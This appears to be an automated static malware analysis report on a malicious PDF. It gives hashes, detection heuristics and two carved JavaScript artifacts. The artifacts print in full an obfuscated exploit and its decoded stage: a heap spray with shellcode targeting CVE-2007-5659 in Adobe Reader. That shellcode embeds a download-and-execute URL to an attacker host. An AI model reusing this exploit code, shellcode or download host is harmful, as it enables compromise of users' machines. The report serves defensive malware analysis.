Malicious PDF — malware analysis report

Static analysis result for SHA-256 515f6eb87ef35bdc…

MALICIOUS

PDF

4.7 KB Created: 2008-08-06 01:42:27 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2013-02-18
MD5: 7e51b7f0e4bf6d2063e1af6795aea2db SHA-1: cd95006dac4e89a311bd41cded7f6149405b4549 SHA-256: 515f6eb87ef35bdc1b886644888b216a361229a1a210011c9b3cc1f6a55601aa
290 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The JavaScript stream includes an eval() call, which is a strong indicator of obfuscation and dynamic code execution. This suggests the script is designed to download and execute a second-stage payload from a remote source. The obfuscation makes it difficult to determine the exact nature of that payload without further dynamic analysis; the download URL itself was recovered by static stage recovery and is listed under Embedded URL below.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 8

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    function NzPHlQBgLca(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function fsAHi911XA2jMV(BQywh3r9d){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(BQywh3r9d)"+";"+"}");eval("function baGysX(zCCxpvIGxg){var MNXG5uRaAWgTAF="+"0,ThAev=zCCxpvIGxg.l"+"en"+"gth,MZjU0qmGR4=10"+"2"+"4,ubltoyqd,dtqqsu,CYTR7='',XaC2NT=MNXG5uRaAWgTAF,Zhl3TfqRW=MNXG5uRaAWgTAF,QgNAWG66=MNXG5uRaAWgTAF,VZkkcvLpxjI=Ar"+"ra"+"y(63,6,19,20 …
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://abb192.cn/exp/load.php?id=1518&spl=4 Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x369 6342 bytes
SHA-256: 999d71d4fe64f30aeb2bc98cc3e27667e86907c73f339024f4421051688cdf7c
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function NzPHlQBgLca(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function fsAHi911XA2jMV(BQywh3r9d){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(BQywh3r9d)"+";"+"}");eval("function baGysX(zCCxpvIGxg){var MNXG5uRaAWgTAF="+"0,ThAev=zCCxpvIGxg.l"+"en"+"gth,MZjU0qmGR4=10"+"2"+"4,ubltoyqd,dtqqsu,CYTR7='',XaC2NT=MNXG5uRaAWgTAF,Zhl3TfqRW=MNXG5uRaAWgTAF,QgNAWG66=MNXG5uRaAWgTAF,VZkkcvLpxjI=Ar"+"ra"+"y(63,6,19,20,17,7,59,37,0,3,0,0,0,0,0,0,14,49,31,54,55,56,61,9,1,24,21,57,29,52,53,30,62,38,25,4,50,5,8,41,13,60,34,0,0,0,0,15,0,22,16,42,26,10,44,32,27,23,2,40,18,51,46,45,11,48,28,33,47,58,35,36,39,43,12);f"+"o"+"r(dtqqsu=M"+"at"+"h.c"+"ei"+"l(ThAev/"+"MZjU0qmGR4)"+";dtqqsu>MNXG5uRaAWgTAF;dtqqsu-"+"-){fo"+"r(ubltoyqd=Ma"+"th.m"+"in(ThAev,MZjU0qmGR4);ubltoyqd>MNXG5uRaAWgTAF;ubltoyqd-"+"-,ThAev-"+"-){QgNAWG66|"+"=(VZkkcvLpxjI[zCCxpvIGxg.cha"+"rCod"+"eAt(XaC2NT+"+"+)-48])<"+"<Zhl3TfqRW;if(Zhl3TfqRW){CYTR7+"+"=fsAHi911XA2jMV"+"(80^QgNAWG66&"+"2"+"5"+"5);QgNAWG66>"+">="+"8;Zhl3TfqRW-"+"="+"2;}el"+"se{Zhl3TfqRW="+"6"+";}}"+"}return (CYTR7);}var 
C1BCTr=implode('',['qR','lz','Z','8','xXJr1_czmzKks8qN1rP3','mGq','UsVZS2eE7','D','dq','R2GP','z9G','KYv_','qJA@','Jr4','_vU','lU','DSjXk','z9OHw48YbTXY','Hx','VP','I1d8g2Oq','ojr','xg2','@Y39rEUb','1Hq','9','G','DE5_NEm','Xwg','v','OZA','QVPI1d8','g2OySb1Hq9GD','8DOoHi','8RS8_wrmdo8','i8RS8_w','r9r','o','H','i8R','S8','_wrvBv3','ZzvbZ','V','KEmXEH1BZEv','RkH8@0G','aOyHxVNblGZE9rH','w4','8YbTXy','HipqR2GPz9GKYv_qG9Ijk8GC8','TXKr','2G','8giOqoj','rQ','SvVqR25g4','vH','9b11Lf9r','oH5Ik8C','zgX9','Im8CzyHxGAVjr','7gqXm','gT59r2jqN1r7E2Xvz2zg39OT','J','iGwX1R','v','J','i','GwX1RvJiGwX1RvJ','i','GgR4U','l3iGvX','aRl3','iGQRCSWJiG','kHQSW','JiG','kH1I','s','J','iGJIAIvJ','i','GJ','V1','RvJ','iG','JVs','U43iGJg1I7Ji','G','aI4','U23iG','aIsU','a3','iG','kGARa3iG3','IHRJ3iGJ','I4U','a3iGQ4aUa3i','GJz','aSa','3iGW','R','sRwJiG','wGQUvJiGWR','sR','wJiGQJ4UxJ','i','GJIHIvJiGJI4U','l','3','i','GQ4aU','a3iGlw1IvJi','GQU1dx','JiGJSaSsJiG','g','L1IvJiGJI4IsJi','GJ','I','4Ua3iG4SsR','QJiGlwaUl','3iGxL1dxJiG','Q','JaI','sJiGg','LaUsJi','G','JI4Ia3iGJ','I4U','a3iG4SsRQ','JiGlwaUxJ','iG','2','SH','dxJ','iGs','H','aR','a3iGgLQI33iGJIHI33iG','JI4Ua','3','i','G4S','sRQJiGlwaU','vJiGg','H1dxJiGgR','sIsJ','iG','gL1','da3','i','GJI','AIl3','iGJI','4Ua3iG4SsR','QJiGlwQUa3iGZJHdxJiGgU4','dQJiGgLaRxJiGJIs','IWJ','iGJI4Ua','3','i','G','4','Ss','RQJiG4I','sUl3iG3rQRa3i','GWUs','I23iGQR','aI7','J','iGaraS4','3iGJg1IQJ','i','GJI4UJ3iGlS','aUa3','iGWUsR','Q','JiGQ4CSl3i','GJV4S','43i','GJ','3Hd7','JiG','Q4QS','QJ','i','GarQS43iGgLQ','SWJiG','JIs','RwJiGJI4Ua3','iGkLQSa','3iGa31UW','J','iGWRASgJiGxs','1IxJ','iGJI4Ua3iGQRaUa3iGazaS43i','GZU','s','RwJiG','ZRs','R23iGQRQSa3iG2I4S43iGsH1dxJ','iGJI4Ua3','i','GlI4Ua3iG4SsRwJi','Gk','JQU','l3iG','lIaU33iGlSs','RwJi','GgLQUxJi','GJIHdJ','3i','GJI','4Ua3','iG4S','4U23i','GZs','CSa3','iGlzaUa3iG2S','adsJiGZs1d4','3','iGJV4Sa3iGk','U4dxJiGJI4Ua3i','GWU4IgJiGQ4CSa3iGJza','S','43','iGJ3Hd7JiG','Q4QSQJiGa','rQS43iG4IHIxJiG','JI4Ua3iGkJ','aUa3','iGlraUkJiG4','S4','
U23iG3zASl3iGl','zAIwJ','iG','sHQ','S23i','G2I4d43iGlzsS','a3','iG4S','sRwJiGkJ','Q','UvJiGl','IaU43','iGlSsR','wJiGgLQ','U','xJ','iG','JIAS23i','GJI4Ua3iG','JIHd7JiGWU4IgJ','iGQ','4CSa3','iGJra','S43iGJbHd7JiGQ4Q','SQJ','iGa','r','QS43i','GaIHIxJiGJ','I','4U','a','3iGkJaUa3iGQ4a','IgJiGaI4S4','3i','GJ3Hd7JiGQ4QSQ','JiGarQS43i','GJIH','I','xJiGJI4Ua3i','G43','4Ua','3iGlb','sS','wJiGgJ4U23i','Gg','J4U','23','iGgJ4U2','3iGgJ4U2','3iGgXQ','R23iG','l3aUl3','iGQ4QS23iGg4AI','7JiGlb4I','kJiGgR4','Ig','JiGQ4QS43iGQ41Iv','JiGJ','radZJiG','lVQRwJiGlwaUv','JiGWXsRwJiG','Q41','U','vJiGa','Sadl3iGJz4d','xJi','Gl','waI','23iG','W7QRwJiGJzASa3iG3z4I','23','iG4IQ','IQJi','GwGaSJ3iG','ZX4U23iG3zsSWJiGJ8aIWJi','G','a','I4RsJiGs4H','U','7J','iGJrad','l3iGZUQI','J3iGJz','4UZJiG4','I4I','33iGsJHIw','JiGsU1UwJiGWUsSsJiGl31','I43iGg4','QRwJiGl3QRwJ','i','GJ','zASl','3i','Gk7CIZJ','iGJzQR','wJiGQ4aSwJiGazQS','7JiGvGaU23iGJV','sRwJiGJzsRwJiGlSQI','43iGZ4sSZJiGJI4UxJiGsGHIxJiG','sHaI','sJi','G','l','S4IgJiG4zQ','S3','3iG4','8aSZJi','G','J','I4SsJiGx4Q','RkJ','iGxHCR','w','JiGZRAI4','3iGQUQ','Ia3','iGQGQ','RZJiG','v7CIsJiGZJ','A','I','Z','JiGQJs','Rv','Ji','G','QJQIa3iGx','HCRkJiGQXsIa3iG','QUQRa3iGZJsR','wJiGQsCR','gJ','iGvRARgJiGQ4QRWJiGvUCI','33i','GvU','CI7JiGZRCIkJiGx','H','CRv','J','iGv4sR23iGgHC','IwG','iOyHxG','AVjr','GkAz7Xg','Ue3Z1','Zr','HRqN1rgsjRg','H','1I','gH','CdqRlzZ8i','8TSs5GkbVagQ','@US9','roHiG','VrmzkYA8Dw','gBY3v_Dbj@qW5rZo1rQSv','VqGZ_Qs18E8ihq7','g1m3','C8akbGdVTUwHiBqsi8','T','Ss5Gkb','Va','gQ@US','mOgsTIk7DdqRlzZ8i8RS','8_w','r9roHiG','P','3m','V','mS9VNgxrN','Jldg','71I','NJ','ldg71I','T7','DdqUb1Hq9','GD8ihqJ','A@Jr4','_','vUlUDSjXkz9OHw48Y','bTXYH','xVPI1d','8g2OyHx','GA','V','jr','KkvzL','Ev1C','8g5kHihq','sxXL81X1z','8RIMA','@qN5','rgsjRgH1IgHaO07g1m3C8ak','bGdVT','Uwo1rCYvVqsxGAVjr3','zg','jQHa1FM1Iy4A8eI1','IRM9hK','kvzL','E','v1C8g5ko1U9kgRg74','_','6oiOqojrC3ARYkT','zmwv','1jf','8U9kgRg','7','4','_X8ihqU','b1Hq','9G','D8DOqJ','jjDz9eB','zqXGf1','ro8ipqR2GP
z','9G','K','Yv_q','Lq','IWYv1v7sRMz8H2VQ1E','7','5ry8xGAVjrezQG6MAHqN1','rA8j','VPRl@NrlXZ','IbXZz','l@0','EvB','wYm8wVl@Pr','9OKo1re','zQG6MAHqN1re','zQG6','MAHPGlXgq2','zm39','O0A8U0','L9BTGiOyHxGA','V','j','rUzj1','Ig','8@NIv','5mw','95jV1roHx_Nrjr4V','Z','VAw','jOezQG6MAHP','X','9@AVl','Swg5I','K','AxjvR','T@LrgBmg2','zZSH','GE','UaOYWqIQf255EDz','ESvV4bjOZ7i','OyHi@C85OE','JqVIgHjE3vXOz2','@rVgIp','8a9qNa','hq','s1rCR5rEsiHvgH','1Vg2XCEAz','Kqs','8','ZobIX8i','h','oHiIqRxLqJqVIgHjE3vXOz2@rV','gIpVa9','qA1rZ75rfqjr','Uzj1Ig','8@NIv5mw9','5jV','CjsN8rfHiIK7','5','r','fqjrEJqVIgHjE','3vXOz2@rVgI','p','8a','9qNa','h','qL1rCR5rUz','j1Ig8@NIv5','mw95','jVC','jsN8rfH','iIK','H5pf','8','5OUzj1Ig8@NIv5mw95jV','CjgN8rfHDR','K75ry8xzgGgj','wI9V','DwmX788O','Ko','1rQSv','VqRHdZ','G4z','3zHGNMAGA8ihq','JZ_NzTzA8','l','XEG','i','L78CzgX2','L7','8CzgXvr','Ko','1','r','xg','2@Y3','9OagQI','lS9U','2blX','L','rlzPA2XPr9GE','85hq4','1RWJQIKHxUkGQSAbASw325x','S','9r6','N1ra','gQI','lS9U2blX','Lr','lzyH5GEwmV','PXm_Yq2zTz8G0VlX','qN1r2Y','9_YSvzPXm_','Yq2','X','mblUFS','2','@Yws_C','Y9OyzlGTkvdq','GxrYNmVDk','1ragQ','IlS','9U2blXLrlzowDdqNjro8DHv7T_dza1','Q4m8','SzsIdgiOyH']);");eval(baGysX(C1BCTr));}
generic_stage_recovery_000.js deobfuscated-js generic stage recovery sixbit-xor-table from JavaScript object 13 at offset 0x369 2584 bytes
SHA-256: be628a456ac9069ed138c2c1b03cac962a6287dffe76509350c290cb89e26c0d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var fE7lzcciJR = new Array(); function EkEGm3qEgqdxc(QIQltg, rn68Ph) { while (QIQltg.length*2<rn68Ph){QIQltg += QIQltg;} QIQltg = QIQltg.substring(0,rn68Ph/2); return QIQltg; } function b0RZtfpgiguP() { var fM0dVS4HMk = 0x0c0c0c0c; var uXgcxOSgY = unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u612F%u6262%u3931%u2E32%u6E63%u652F%u7078%u6C2F%u616F%u2E64%u6870%u3F70%u6469%u313D%u3135%u2638%u7073%u3D6C%u0034"); var YJc5SFZuJrG4 = 0x400000; var QbANYZqF8jUa = uXgcxOSgY.length * 2; var rn68Ph = YJc5SFZuJrG4 - (QbANYZqF8jUa+0x38); var QIQltg = unescape("%u9090%u9090"); QIQltg = EkEGm3qEgqdxc(QIQltg, rn68Ph); var ijbMnJfPN8 = (fM0dVS4HMk - 0x400000)/YJc5SFZuJrG4; for (var DSZ60Im=0;DSZ60Im<ijbMnJfPN8;DSZ60Im++) { fE7lzcciJR[DSZ60Im] = QIQltg + uXgcxOSgY; } } function 
W3yoJ3I6dSTC2J() { var Z3vkMW = app.viewerVersion.toString(); Z3vkMW = Z3vkMW.replace(/\D/g,""); var UsHHXhefNciLR2 = new Array(Z3vkMW.charAt(0),Z3vkMW.charAt(1),Z3vkMW.charAt(2)); if ((UsHHXhefNciLR2[0] == 8 && ((UsHHXhefNciLR2[1] == 1 && UsHHXhefNciLR2[2] < 2) || UsHHXhefNciLR2[1] < 1)) || (UsHHXhefNciLR2[0] == 7 && UsHHXhefNciLR2[1] < 1) || (UsHHXhefNciLR2[0] < 7)) { b0RZtfpgiguP(); var F82BaDCteMwa = unescape("%u0c0c%u0c0c"); while(F82BaDCteMwa.length < 44952) F82BaDCteMwa += F82BaDCteMwa; this.collabStore = Collab.collectEmailInfo({subj: "",msg: F82BaDCteMwa}); } } W3yoJ3I6dSTC2J();